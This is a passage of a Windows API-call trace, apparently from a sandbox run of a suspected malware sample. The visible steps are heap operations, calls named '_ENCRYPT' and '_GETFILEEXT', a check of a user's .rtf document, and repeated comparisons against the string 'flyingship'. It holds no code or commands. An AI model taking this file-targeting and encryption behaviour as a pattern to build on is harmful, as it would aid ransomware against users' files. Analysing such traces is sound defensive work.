dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.805] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.805] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.806] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0179.806] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.806] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.806] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.807] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.807] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.807] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.808] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.808] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.808] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0179.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.809] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0179.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.809] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.809] CloseHandle (hObject=0x138) returned 1 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.809] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.810] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.810] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.810] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0179.811] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0179.811] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.811] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.811] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.811] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.811] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.811] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0179.811] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.812] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.812] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.812] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.812] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.812] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0x90add8 [0179.814] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.815] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 0x90add8 [0179.815] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0179.815] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0179.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 